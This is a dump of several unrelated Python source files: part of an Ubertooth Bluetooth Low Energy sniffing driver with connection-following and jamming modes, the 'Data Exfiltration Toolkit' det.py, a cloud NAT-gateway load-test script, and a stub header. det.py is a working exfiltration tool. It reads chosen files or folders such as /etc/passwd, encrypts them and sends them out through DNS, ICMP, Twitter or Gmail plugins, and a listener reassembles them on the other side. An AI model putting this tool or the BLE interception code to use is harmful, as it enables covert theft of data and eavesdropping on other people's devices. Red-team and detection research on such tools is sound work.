io.info("Ubertooth can only sniff connections with channel map : "+"0x{:10x}".format(channelMap))
io.success("Channel Map successfully updated : "+"0x{:10x}".format(channelMap))
self._setChannelMap(channelMap)
io.info("Recovering Hop Interval ...")
def _updateHopInterval(self,hopInterval=None):
io.success("Hop Interval successfully recovered : "+str(hopInterval))
self._setHopInterval(hopInterval)
io.info("Recovering Hop Increment ...")
def _updateHopIncrement(self,hopIncrement=None):
io.success("Hop Increment successfully recovered : "+str(hopIncrement))
self._setHopIncrement(hopIncrement)
io.info("All parameters recovered, following connection ...")
def stop(self):
super()._stop()
self.ubertooth.close()
def init(self):
self.initializeBluetooth = False
self.sniffingMode = BLESniffingMode.EXISTING_CONNECTION
super().init()
if self.ubertooth is not None:
self._initBLE()
self.ready = True
def setCRCChecking(self,enable=True):
'''
This method enables CRC Checking.
:param enable: boolean indicating if CRC Checking must be enabled
:type enable: bool
:Example:
>>> device.setCRCChecking(enable=True) # CRC Checking enabled
>>> device.setCRCChecking(enable=False) # CRC Checking disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.crcEnabled = enable
def getSerial(self):
'''
This method allows to get the device's serial number.
:return: device's serial number
:rtype: str
:Example:
>>> device.getSerial()
'1160010b201835ae6d474553-79e1ff0b'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.lock.acquire()
serial = self._getSerial()
self.lock.release()
return serial
def getMode(self):
'''
This method returns the mode actually in use in the current Ubertooth Device ("Bt" or "BLE")
:return: string indicating the mode
:rtype: str
:Example:
>>> device.getMode()
"BLE"
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return "BLE"
def getChannel(self):
'''
This method returns the channel actually in use.
:return: channel in use
:rtype: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.channel
def setChannel(self, channel=37):
'''
This method changes the channel actually in use by the provided channel.
:param channel: new channel
:type channel: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if channel is not None and channel != self.channel:
frequency = helpers.channelToFrequency(channel)
self.channel = channel
self.lock.acquire()
self._stop()
self._setFrequency(frequency)
self._start()
self.lock.release()
def restartSniffingMode(self):
'''
This method restarts the sniffing mode.
:Example:
>>> device.restartSniffingMode()
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if self.sniffingMode == BLESniffingMode.NEW_CONNECTION:
self.sniffNewConnections()
else:
self.sniffExistingConnections()
def sniffAdvertisements(self,address="00:00:00:00:00:00",channel=None):
'''
This method starts the advertisement sniffing mode.
:param address: selected address - if not provided, no filter is applied (format : "1A:2B:3C:4D:5E:6F")
:type address: str
:param channel: selected channel - if not provided, channel 37 is selected
:type channel: int
:Example:
>>> device.sniffAdvertisements()
>>> device.sniffAdvertisements(channel=38)
>>> device.sniffAdvertisements(address="1A:2B:3C:4D:5E:6F")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sniffingMode = BLESniffingMode.ADVERTISEMENT
self.synchronized = False
self.lock.acquire()
self._stop()
self._setTarget(address)
self._setCRCChecking(True)
self.setCRCChecking(True)
self._start()
self.lock.release()
if channel is None:
channel = 37
if not self.sweepingMode:
self.setChannel(channel)
def sniffNewConnections(self,address="00:00:00:00:00:00",channel=None):
'''
This method starts the new connections sniffing mode.
:param address: selected address - if not provided, no filter is applied (format : "1A:2B:3C:4D:5E:6F")
:type address: str
:param channel: selected channel - if not provided, channel 37 is selected
:type channel: int
:Example:
>>> device.sniffNewConnections()
>>> device.sniffNewConnections(channel=38)
>>> device.sniffNewConnections(address="1A:2B:3C:4D:5E:6F")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sniffingMode = BLESniffingMode.NEW_CONNECTION
self.synchronized = False
self.lock.acquire()
self._stop()
if self.jamming:
self._setJamMode(JAM_CONTINUOUS)
else:
self._setJamMode(JAM_NONE)
self._setTarget(address)
self._setCRCChecking(False)
self._start()
self.lock.release()
if channel is None:
channel = 37
if not self.sweepingMode:
self.setChannel(channel)
def sniffExistingConnections(self,accessAddress=None,crcInit=None,channelMap=None):
'''
This method starts the existing connections sniffing mode.
:param accessAddress: selected Access Address - if not provided, the parameter is recovered
:type address: int
:param crcInit: selected CRCInit - if not provided, the parameter is recovered
:type crcInit: int
:param channelMap: selected Channel Map - if not provided, the parameter is recovered
:type channelMap: int
:Example:
>>> device.sniffExistingConnections()
>>> device.sniffExistingConnections(accessAddress=0xe5e296e9)
>>> device.sniffAdvertisements(accessAddress=0xe5e296e9, crcInit=0x0bd54a)
>>> device.sniffAdvertisements(accessAddress=0xe5e296e9, crcInit=0x0bd54a, channelMap=0x1fffffffff)
.. warning::
Please note the following warnings :
* Ubertooth is actually not able to set CRC Init value and uses a full Channel Map (0x1fffffffff). This parameters are provided in order to provide the same API for Ubertooth and BTLEJack devices.
* If no access address is provided, Ubertooth tries to get multiple candidate access addresses and select the most probable address
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sniffingMode = BLESniffingMode.EXISTING_CONNECTION
self.synchronized = False
self.lock.acquire()
self._stop()
if self.jamming:
self._setJamMode(JAM_CONTINUOUS)
else:
self._setJamMode(JAM_NONE)
self._setCRCChecking(False)
if accessAddress is not None:
self._setAccessAddress(accessAddress)
else:
self._setTarget("00:00:00:00:00:00")
if crcInit is not None:
io.warning("Ubertooth is not able to set CrcInit value ! Parameter will be ignored.")
if channelMap is not None:
io.warning("Ubertooth uses full channel map : 0x1fffffffff. Parameter will be ignored.")
self._start()
self.lock.release()
def _start(self):
if self.sniffingMode == BLESniffingMode.EXISTING_CONNECTION:
self._setPromiscuousMode()
elif self.sniffingMode == BLESniffingMode.NEW_CONNECTION:
self._setBTLESniffing()
elif self.sniffingMode == BLESniffingMode.ADVERTISEMENT:
self._setBTLESniffing()
def setScanInterval(self,seconds=1):
'''
This method allows to provide the scan interval (in second).
:param seconds: number of seconds to wait between two channels
:type seconds: float
:Example:
>>> device.setScanInterval(seconds=1)
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.scanInterval = seconds
def _scanThread(self):
self.setChannel(37)
utils.wait(seconds=self.scanInterval)
self.setChannel(38)
utils.wait(seconds=self.scanInterval)
self.setChannel(39)
utils.wait(seconds=self.scanInterval)
def setScan(self,enable=True):
'''
This method enables or disables the scanning mode. It allows to change the channel according to the scan interval parameter.
:param enable: boolean indicating if the scanning mode must be enabled
:type enable: bool
:Example:
>>> device.setScan(enable=True) # scanning mode enabled
>>> device.setScan(enable=False) # scanning mode disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if enable:
self.sniffAdvertisements()
self._setCRCChecking(True)
if self.scanThreadInstance is None:
self.scanThreadInstance = wireless.StoppableThread(target=self._scanThread)
self.scanThreadInstance.start()
else:
self.scanThreadInstance.stop()
self.scanThreadInstance = None
def recv(self):
self.lock.acquire()
data = self._poll()
self.lock.release()
if data is not None and len(data) > 1:
#print(bytes(data).hex())
packet = Ubertooth_Hdr(bytes(data))
if BTLE_Promiscuous_Access_Address in packet:
self._updateAccessAddress(packet.access_address)
elif BTLE_Promiscuous_CRCInit in packet:
self._updateCrcInit(packet.crc_init)
self._updateChannelMap()
elif BTLE_Promiscuous_Hop_Interval in packet:
self._updateHopInterval(packet.hop_interval)
elif BTLE_Promiscuous_Hop_Increment in packet:
self._updateHopIncrement(packet.hop_increment)
self.synchronized = True
else:
if BTLE_CONNECT_REQ in packet or hasattr(packet,"PDU_type") and packet.PDU_type == 5:
self._stopSweepingThread()
self.accessAddress = (struct.unpack(">I",struct.pack("<I",packet.AA))[0])
self.crcInit = (struct.unpack(">I",b"\x00" + struct.pack('<I',packet.crc_init)[:3])[0])
self.channelMap = (packet.chM)
self.hopInterval = (packet.interval)
self.hopIncrement = (packet.hop)
self.synchronized = True
payload = bytes(packet[1:])[4:-3]
givenCrc = bytes(packet[1:])[-3:]
if helpers.crc24(payload,len(payload)) == givenCrc or not self.crcEnabled:
return packet
return None
else:
return None
def _setJamMode(self,mode=JAM_NONE):
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_JAM_MODE,mode, 0)
def _setFrequency(self,channel=2402):
self.ubertooth.ctrl_transfer(CTRL_OUT, UBERTOOTH_SET_CHANNEL, channel, 0)
def _getFrequency(self):
channel = self.ubertooth.ctrl_transfer(CTRL_IN,UBERTOOTH_GET_CHANNEL,0, 0,2)
channel = struct.unpack('H',channel)[0]
return channel
def _getAccessAddress(self):
aa = self.ubertooth.ctrl_transfer(CTRL_IN,UBERTOOTH_GET_ACCESS_ADDRESS,0, 0,4)
aa = struct.unpack('<I',aa)[0]
return aa
def _setAccessAddress(self,aa):
data = array.array("B", [ (aa & 0xFF) ,(aa & 0x0000FF00) >> 8, (aa & 0x00FF0000) >> 16, (aa & 0xFF000000) >> 24])
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_SET_ACCESS_ADDRESS,0,0, data,timeout=3000)
def _setTarget(self,target="00:00:00:00:00:00"):
utils.wait(seconds=1)
data = array.array("B", bytes.fromhex(target.replace(":",""))+bytes(0x30))
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_BTLE_SET_TARGET,0,0, data,timeout=5000)
def _setBTLESniffing(self):
utils.wait(seconds=0.5)
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_BTLE_SNIFFING,
(0 if self.sniffingMode == BLESniffingMode.ADVERTISEMENT else 2), 0)
def _setPromiscuousMode(self):
utils.wait(seconds=0.5)
self.ubertooth.ctrl_transfer(CTRL_OUT,UBERTOOTH_BTLE_PROMISC,0, 0)
def _poll(self):
try:
result = self.ubertooth.ctrl_transfer(CTRL_IN,UBERTOOTH_POLL,0, 0,512,timeout=100)
utils.wait(seconds=0.001)
except usb.core.USBError as e:
#io.fail("USB Error : "+str(e))
return array.array('B',[])
return result
|
det.py
|
from __future__ import print_function
import os
import random
import threading
import hashlib
import argparse
import sys
import string
import time
import json
import signal
import struct
import tempfile
from random import randint
from os import listdir
from os.path import isfile, join
from Crypto.Cipher import AES
from Crypto.Cipher import XOR
from zlib import compress, decompress
from plugins import dukpt
import base64
import csv
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
if getattr(sys, 'frozen', False):
os.chdir(sys._MEIPASS)
KEY = ""
MIN_TIME_SLEEP = 1
MAX_TIME_SLEEP = 30
MIN_BYTES_READ = 1
MAX_BYTES_READ = 500
COMPRESSION = True
files = {}
threads = []
config = None
dukpt_client = None
dukpt_server = None
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def display_message(message):
print("[%s] %s" % (time.strftime("%Y-%m-%d.%H:%M:%S", time.gmtime()), message))
def warning(message):
display_message("%s%s%s" % (bcolors.WARNING, message, bcolors.ENDC))
def ok(message):
display_message("%s%s%s" % (bcolors.OKGREEN, message, bcolors.ENDC))
def info(message):
display_message("%s%s%s" % (bcolors.OKBLUE, message, bcolors.ENDC))
# http://stackoverflow.com/questions/12524994/encrypt-decrypt-using-pycrypto-aes-256
def aes_encrypt(message, key=KEY):
try:
ksn = ""
# If using DUKPT, generate a new key
if dukpt_client:
info = dukpt_client.gen_key()
key = info['key']
ksn = info['ksn']
# Generate random CBC IV
iv = os.urandom(AES.block_size)
# Derive AES key from passphrase
aes = AES.new(hashlib.sha256(key).digest(), AES.MODE_CBC, iv)
# Add PKCS5 padding
pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)
# Return data size, iv and encrypted message
return aes.encrypt(pad(message))
except:
return None
def aes_decrypt(message, key=KEY):
try:
# Retrieve CBC IV
iv = message[:AES.block_size]
if dukpt_server:
ksn = message[AES.block_size:AES.block_size+dukpt_server.KSN_LEN]
message = message[AES.block_size+dukpt_server.KSN_LEN:]
key = dukpt_server.gen_key(ksn)
else:
message = message[AES.block_size:]
# Derive AES key from passphrase
aes = AES.new(hashlib.sha256(key).digest(), AES.MODE_CBC, iv)
message = aes.decrypt(message)
# Remove PKCS5 padding
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
return unpad(message)
except:
return None
# Do a md5sum of the file
def md5(f):
hash = hashlib.md5()
for chunk in iter(lambda: f.read(4096), ""):
hash.update(chunk)
return hash.hexdigest()
function_mapping = {
'display_message': display_message,
'warning': warning,
'ok': ok,
'info': info,
'aes_encrypt' : aes_encrypt,
'aes_decrypt': aes_decrypt
}
class Exfiltration(object):
def __init__(self, results, KEY):
self.KEY = KEY
self.plugin_manager = None
self.plugins = {}
self.results = results
self.target = "127.0.0.1"
path = "plugins/"
plugins = {}
# Load plugins
sys.path.insert(0, path)
for f in os.listdir(path):
fname, ext = os.path.splitext(f)
if ext == '.py' and self.should_use_plugin(fname):
mod = __import__(fname)
plugins[fname] = mod.Plugin(self, config["plugins"][fname])
def should_use_plugin(self, plugin_name):
# if the plugin has been specified specifically (-p twitter)
if self.results.plugin and plugin_name not in self.results.plugin.split(','):
return False
# if the plugin is not in the exclude param
elif self.results.exclude and plugin_name in self.results.exclude.split(','):
return False
else:
return True
def register_plugin(self, transport_method, functions):
self.plugins[transport_method] = functions
def get_plugins(self):
return self.plugins
def aes_encrypt(self, message):
return aes_encrypt(message, self.KEY)
def aes_decrypt(self, message):
return aes_decrypt(message, self.KEY)
def log_message(self, mode, message):
if mode in function_mapping:
function_mapping[mode](message)
def get_random_plugin(self):
plugin_name = random.sample(self.plugins, 1)[0]
return plugin_name, self.plugins[plugin_name]['send']
def use_plugin(self, plugins):
tmp = {}
for plugin_name in plugins.split(','):
if (plugin_name in self.plugins):
tmp[plugin_name] = self.plugins[plugin_name]
self.plugins.clear()
self.plugins = tmp
def remove_plugins(self, plugins):
for plugin_name in plugins:
if plugin_name in self.plugins:
del self.plugins[plugin_name]
display_message("{0} plugins will be used".format(
len(self.get_plugins())))
def register_file(self, message):
global files
jobid = message[0]
if jobid not in files:
files[jobid] = {}
files[jobid]['checksum'] = message[3].lower()
files[jobid]['filename'] = message[1].lower()
files[jobid]['data'] = []
files[jobid]['packets_order'] = []
files[jobid]['packets_len'] = -1
warning("Register packet for file %s with checksum %s" %
(files[jobid]['filename'], files[jobid]['checksum']))
def retrieve_file(self, jobid):
global files
fname = files[jobid]['filename']
filename = "%s.%s" % (fname.replace(
os.path.pathsep, ''), time.strftime("%Y-%m-%d.%H:%M:%S", time.gmtime()))
#Reorder packets before reassembling / ugly one-liner hack
files[jobid]['packets_order'], files[jobid]['data'] = \
[list(x) for x in zip(*sorted(zip(files[jobid]['packets_order'], files[jobid]['data'])))]
content = ''.join(str(v) for v in files[jobid]['data']).decode('hex')
content = aes_decrypt(content, self.KEY)
if COMPRESSION:
content = decompress(content)
try:
with open(filename, 'w') as f:
f.write(content)
except IOError as e:
warning("Got %s: cannot save file %s" % filename)
raise e
if (files[jobid]['checksum'] == md5(open(filename))):
ok("File %s recovered" % (fname))
else:
warning("File %s corrupt!" % (fname))
del files[jobid]
def retrieve_data(self, data):
global files
try:
message = data
if (message.count("|!|") >= 2):
info("Received {0} bytes".format(len(message)))
message = message.split("|!|")
jobid = message[0]
# register packet
if (message[2] == "REGISTER"):
self.register_file(message)
# done packet
elif (message[2] == "DONE"):
files[jobid]['packets_len'] = int(message[1])
#Check if all packets have arrived
if files[jobid]['packets_len'] == len(files[jobid]['data']):
self.retrieve_file(jobid)
else:
warning("[!] Received the last packet, but some are still missing. Waiting for the rest...")
# data packet
else:
# making sure there's a jobid for this file
if (jobid in files and message[1] not in files[jobid]['packets_order']):
files[jobid]['data'].append(''.join(message[2:]))
files[jobid]['packets_order'].append(int(message[1]))
#In case this packet was the last missing one
if files[jobid]['packets_len'] == len(files[jobid]['data']):
self.retrieve_file(jobid)
except:
raise
pass
class ExfiltrateFile(threading.Thread):
def __init__(self, exfiltrate, file_to_send):
threading.Thread.__init__(self)
self.file_to_send = file_to_send
self.exfiltrate = exfiltrate
self.jobid = ''.join(random.sample(
string.ascii_letters + string.digits, 7))
self.checksum = '0'
self.daemon = True
def run(self):
# checksum
if self.file_to_send == 'stdin':
file_content = sys.stdin.read()
buf = StringIO(file_content)
e = StringIO(file_content)
else:
with open(self.file_to_send, 'rb') as f:
file_content = f.read()
buf = StringIO(file_content)
e = StringIO(file_content)
self.checksum = md5(buf)
del file_content
# registering packet
plugin_name, plugin_send_function = self.exfiltrate.get_random_plugin()
ok("Using {0} as transport method".format(plugin_name))
# sending the data
f = tempfile.SpooledTemporaryFile()
data = e.read()
if COMPRESSION:
data = compress(data)
f.write(aes_encrypt(data, self.exfiltrate.KEY))
f.seek(0)
e.close()
packet_index = 0
maximum = 43000
methods = [ #8600 each
'aes',
'xor',
'plaintext',
'b64',
'b32'
]
file = open('etc/exfiltration_data.csv', 'rb')
reader = csv.reader(file)
for method in methods:
while (True):
if method == 'aes':
data_file = base64.standard_b64encode(f.read(randint(MIN_BYTES_READ, MAX_BYTES_READ)))
elif method == 'xor':
unencrypted = next(reader)[0]
key = "abcdefghijklmnopqrstuvwxqzabcdefghijklmnopqrstuvwxqzabcdefghijklmnopqrstuvwxqzabcdefghijklmnopqrstuvwxqz"
xor_cipher = XOR.new("".join(random.sample(key, 20)))
data_file = base64.b32encode(xor_cipher.encrypt(unencrypted)).lower()
elif method == 'plaintext':
data_file = next(reader)[0]
elif method == 'b64':
unencoded = next(reader)[0]
data_file = base64.standard_b64encode(unencoded)
elif method == 'b32':
unencoded = next(reader)[0]
data_file = base64.b32encode(unencoded).lower()
else:
break
while data_file[-1] == '=':
data_file = data_file[:len(data_file) - 1]
plugin_name, plugin_send_function = self.exfiltrate.get_random_plugin()
ok("Using {0} as transport method with method {1} : {2} ".format(plugin_name, method, packet_index))
data = data_file
try:
plugin_send_function(data)
except Exception as e:
print(e)
print("EXCEPTION! - skipping packet and not counting it...")
packet_index = packet_index + 1
if packet_index % 8600 == 0:
#time.sleep(10)
print("\n\n")
break
def signal_handler(bla, frame):
global threads
warning('Killing DET and its subprocesses')
os.kill(os.getpid(), signal.SIGKILL)
def main():
global MAX_TIME_SLEEP, MIN_TIME_SLEEP, KEY, MAX_BYTES_READ, MIN_BYTES_READ, COMPRESSION
global threads, config
global dukpt_client, dukpt_server
parser = argparse.ArgumentParser(
description='Data Exfiltration Toolkit (@PaulWebSec)')
parser.add_argument('-c', action="store", dest="config", default=None,
help="Configuration file (eg. '-c ./config-sample.json')")
parser.add_argument('-f', action="append", dest="file",
help="File to exfiltrate (eg. '-f /etc/passwd')")
parser.add_argument('-d', action="store", dest="folder",
help="Folder to exfiltrate (eg. '-d /etc/')")
parser.add_argument('-p', action="store", dest="plugin",
default=None, help="Plugins to use (eg. '-p dns,twitter')")
parser.add_argument('-e', action="store", dest="exclude",
default=None, help="Plugins to exclude (eg. '-e gmail,icmp')")
listenMode = parser.add_mutually_exclusive_group()
listenMode.add_argument('-L', action="store_true",
dest="listen", default=False, help="Server mode")
listenMode.add_argument('-Z', action="store_true",
dest="proxy", default=False, help="Proxy mode")
results = parser.parse_args()
if (results.config is None):
print("Specify a configuration file!")
parser.print_help()
sys.exit(-1)
with open(results.config) as data_file:
config = json.load(data_file)
# catch Ctrl+C
signal.signal(signal.SIGINT, signal_handler)
ok("CTRL+C to kill DET")
MIN_TIME_SLEEP = int(config['min_time_sleep'])
MAX_TIME_SLEEP = int(config['max_time_sleep'])
MIN_BYTES_READ = int(config['min_bytes_read'])
MAX_BYTES_READ = int(config['max_bytes_read'])
COMPRESSION = bool(config['compression'])
if 'IPEK' in config:
IPEK = config['IPEK']
KSN = config['KSN']
dukpt_client = dukpt.Client(IPEK.decode('hex'), KSN.decode('hex'))
elif 'BDK' in config:
BDK = config['BDK']
dukpt_server = dukpt.Server(BDK.decode('hex'))
else:
KEY = config['AES_KEY']
app = Exfiltration(results, KEY)
# LISTEN/PROXY MODE
if (results.listen or results.proxy):
threads = []
plugins = app.get_plugins()
for plugin in plugins:
if results.listen:
thread = threading.Thread(target=plugins[plugin]['listen'])
elif results.proxy:
thread = threading.Thread(target=plugins[plugin]['proxy'])
thread.daemon = True
thread.start()
threads.append(thread)
# EXFIL mode
else:
if (results.folder is None and results.file is None):
warning("[!] Specify a file or a folder!")
parser.print_help()
sys.exit(-1)
if (results.folder):
files = ["{0}{1}".format(results.folder, f) for
f in listdir(results.folder)
if isfile(join(results.folder, f))]
else:
files = list(set(results.file))
threads = []
for file_to_send in files:
info("Launching thread for file {0}".format(file_to_send))
thread = ExfiltrateFile(app, file_to_send)
threads.append(thread)
thread.daemon = True
thread.start()
# Join for the threads
for thread in threads:
while True:
thread.join(1)
if not thread.isAlive():
break
if __name__ == '__main__':
main()
|
natgw.py
|
# coding=utf-8
import os
import json
import sys
import time
from optparse import OptionParser
from threading import Thread
SERVER_CODE = r'''# coding=utf-8
import select
import socket
import time
from Queue import Queue
from threading import Thread
ADDRESS = ('%s', 8080)
class LogThread(Thread):
def __init__(self):
super(LogThread, self).__init__()
self.msg_queue = Queue(maxsize=10000)
def run(self):
f = open('./client_test.log', mode='w')
while True:
msg = self.msg_queue.get()
f.write(msg + '\n')
def add_msg(self, msg):
self.msg_queue.put(msg)
class Server(object):
def __init__(self):
self.connections = {}
def start(self):
logthr = LogThread()
logthr.setDaemon(True)
logthr.start()
server_sock = socket.socket()
server_sock.setblocking(False)
server_sock.bind(ADDRESS)
server_sock.listen(128)
epoll_obj = select.poll()
epoll_obj.register(server_sock.fileno(), select.EPOLLIN | select.EPOLLOUT | select.EPOLLERR)
stop_time = time.time() + 2400
while stop_time - time.time() > 0:
events = epoll_obj.poll()
# print(events)
for fd, event in events:
if fd == server_sock.fileno():
conn, address = server_sock.accept()
conn.setblocking(False)
epoll_obj.register(conn.fileno(), select.EPOLLIN)
self.connections[conn.fileno()] = conn
else:
if event & select.EPOLLIN:
data = self.connections[fd].recv(1024)
msg = data.decode("utf-8")
if msg == "end" or not data:
self.connections[fd].close()
epoll_obj.unregister(fd)
del self.connections[fd]
else:
logthr.add_msg(msg)
elif event & select.EPOLLOUT:
pass
elif event & select.EPOLLERR:
self.connections[fd].close()
epoll_obj.unregister(fd)
del self.connections[fd]
server_sock.close()
s = Server()
s.start()
'''
CLIENT_CODE = r'''#coding=utf-8
import random
import socket
import time
from Queue import Queue
import threading
import traceback
SERVERS = [%s]
MAX_THR = 25000
STEP = 21
max_count = MAX_THR
step_count = 500
lock = threading.RLock()
class LogThread(threading.Thread):
def __init__(self):
super(LogThread, self).__init__()
self.msg_queue = Queue(maxsize=10000)
def run(self):
f = open('./client_test.log', mode='w')
while True:
msg = self.msg_queue.get()
f.write(msg + '\n')
def add_msg(self, msg):
self.msg_queue.put(msg)
class ClientHandler(threading.Thread):
def __init__(self, id, logthr):
super(ClientHandler, self).__init__()
self.id = id
self.logthr = logthr
def run(self):
try:
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = random.sample(SERVERS, 1)[0]
server_addr = (server, 8080)
client_sock.connect(server_addr)
for r in range(0, STEP):
start_time = time.time()
if r == STEP - 1:
msg = 'end'
else:
msg = 'test client'
client_sock.send(msg.encode())
recv_data = client_sock.recv(1024)
self.logthr.add_msg("thread {} clent received msg:{}".format(self.id, recv_data))
if time.time() - start_time < 60:
time.sleep(60 + start_time - time.time())
client_sock.close()
except Exception as e:
info = traceback.format_exc()
self.logthr.add_msg("thread {} exception:{}".format(self.id, info))
finally:
try:
lock.acquire()
global max_count
max_count = max_count - 1
finally:
lock.release()
class Main(object):
def __init__(self):
pass
def start(self):
logthr = LogThread()
logthr.setDaemon(True)
logthr.start()
step = MAX_THR / step_count
for i in range(step):
for j in range(step_count):
t = ClientHandler(i * step_count + j, logthr)
t.start()
time.sleep(2)
global max_count
while max_count > 0:
time.sleep(1)
logthr.add_msg('exited')
m = Main()
m.start()
'''.decode('utf-8')
def exec_cmd(cmd):
try:
val = os.popen(cmd)
print cmd
return val
except Exception as e:
print ('exec cmd {} failed'.format(e.message))
return None
def get_instance_infos(tag_id):
results = exec_cmd('/pitrix/cli/describe-instances -T %s -f /pitrix/conf/client.yaml' % tag_id)
result_json = get_json_data(results)
instance_list = result_json['instance_set']
return instance_list
def get_json_data(results):
need_datas = []
start = False
for line in results.readlines():
if line.startswith('recv'):
line = line.replace('recv:', '')
start = True
if start and '0' != line:
need_datas.append(line)
s = ''.join(need_datas)
val = json.loads(s)
return val
def start_server(instance):
instance_id = instance['instance_id']
host_machine = instance['host_machine']
ip_addr = instance['vxnets'][0]['private_ip']
tmp_file = './%s' % instance_id
fd = open(tmp_file, mode='w')
fd.write(SERVER_CODE % ip_addr)
fd.close()
cmd = 'scp %s root@%s:/root/' % (tmp_file, host_machine)
res = exec_cmd(cmd)
if res:
copy_cmd = '''ssh root@{host_machine} "safe-guest-ftp {instance_id} put '/root/{instance_id}' '/root/server.py' 5" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(copy_cmd)
start_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} 'python /root/server.py &' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(start_cmd)
rm_cmd = '''ssh root@{host_machine} "rm -f /root/{instance_id}" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(rm_cmd)
exec_cmd('rm -f %s' % tmp_file)
def start_client(instance, eip_str):
instance_id = instance['instance_id']
host_machine = instance['host_machine']
tmp_file = './%s' % instance_id
fd = open(tmp_file, mode='w')
content = CLIENT_CODE % eip_str
fd.write(content.encode('utf-8'))
fd.close()
cmd = 'scp %s root@%s:/root/' % (tmp_file, host_machine)
res = exec_cmd(cmd)
if res:
copy_cmd = '''ssh root@{host_machine} "safe-guest-ftp {instance_id} put '/root/{instance_id}' '/root/client.py' 5" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(copy_cmd)
start_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} 'python /root/client.py &' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(start_cmd)
rm_cmd = '''ssh root@{host_machine} "rm -f /root/{instance_id}" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(rm_cmd)
exec_cmd('rm -f %s' % tmp_file)
def start_service(server_tag, client_tag, client_only=0):
server_insts = get_instance_infos(server_tag)
eips = [i['eip']['eip_addr'] for i in server_insts]
if not client_only:
for server in server_insts:
new_task(start_server, server)
time.sleep(2)
client_insts = get_instance_infos(client_tag)
fotmat_eips = []
for e in eips:
fotmat_eips.append('\'' + e + '\'')
eip_str = ','.join(fotmat_eips)
for client_inst in client_insts:
new_task(start_client, client_inst, eip_str)
def new_task(task, *args):
t = Thread(target=task, args=args)
t.start()
def stop(instance, script_name):
instance_id = instance['instance_id']
host_machine = instance['host_machine']
tmp_file = './%s.stop' % instance_id
fd = open(tmp_file, mode='w')
fd.write("ps -ef | grep %s.py|awk '{print $2}'| xargs kill -9" % script_name)
fd.close()
cmd = 'scp %s root@%s:/root/%s' % (tmp_file, host_machine, tmp_file)
res = exec_cmd(cmd)
if res:
copy_cmd = '''ssh root@{host_machine} "safe-guest-ftp {instance_id} put '/root/{instance_id}.stop' '/root/stop.sh' 5" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(copy_cmd)
ch_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} 'chmod +x /root/stop.sh' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(ch_cmd)
stop_cmd = '''ssh root@{host_machine} "safe-guest-sh {instance_id} './stop.sh' 1" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(stop_cmd)
rm_cmd = '''ssh root@{host_machine} "rm -f /root/{instance_id}.stop" '''.format(
host_machine=host_machine,
instance_id=instance_id
)
exec_cmd(rm_cmd)
exec_cmd('rm -f %s' % tmp_file)
def stop_service(server_tag, client_tag, client_only=0):
if not client_only:
server_insts = get_instance_infos(server_tag)
for server in server_insts:
new_task(stop, server, 'server')
client_insts = get_instance_infos(client_tag)
for client in client_insts:
new_task(stop, client, 'client')
def _get_opt_parser():
''' get option parser '''
MSG_USAGE = '''%prog [-c "client_tag_id" -s "server_tag_id"] [options] [-f <conf_file>]'''
opt_parser = OptionParser(MSG_USAGE)
opt_parser.add_option("-c", "--client_tag_id", action="store", type="string",
dest="client_tag_id", help='''client_tag_id''', default="")
opt_parser.add_option("-o", "--client_only", action="store", type=int,
dest="client_only", help='''start client only''', default=0)
opt_parser.add_option("-s", "--server_tag_id", action="store", type="string",
dest="server_tag_id", help='''server_tag_id''', default="")
opt_parser.add_option("-a", "--action", action="store", type="string",
dest="action", help='''start or stop''', default="start")
return opt_parser
def main(args):
parser = _get_opt_parser()
(options, _) = parser.parse_args(args)
# send request
action = options.action
client_tag_id = options.client_tag_id
server_tag_id = options.server_tag_id
client_only = options.client_only
if not (client_tag_id or server_tag_id):
print '''params 'client_tag_id, server_tag_id' can't be empty'''
return
if action == 'start':
start_service(server_tag_id, client_tag_id, client_only=client_only)
elif action == 'stop':
stop_service(server_tag_id, client_tag_id, client_only=client_only)
else:
print 'invalid action %s' % action
if __name__ == "__main__":
main(sys.argv[1:])
|
SpotterNetPositionSend.py
|
#!/usr/bin/env python3
import json
import logging
import requests
import threading
import time
import socket
import sys
from datetime import datetime
from SpotterNetPositionObject import SNPosObject
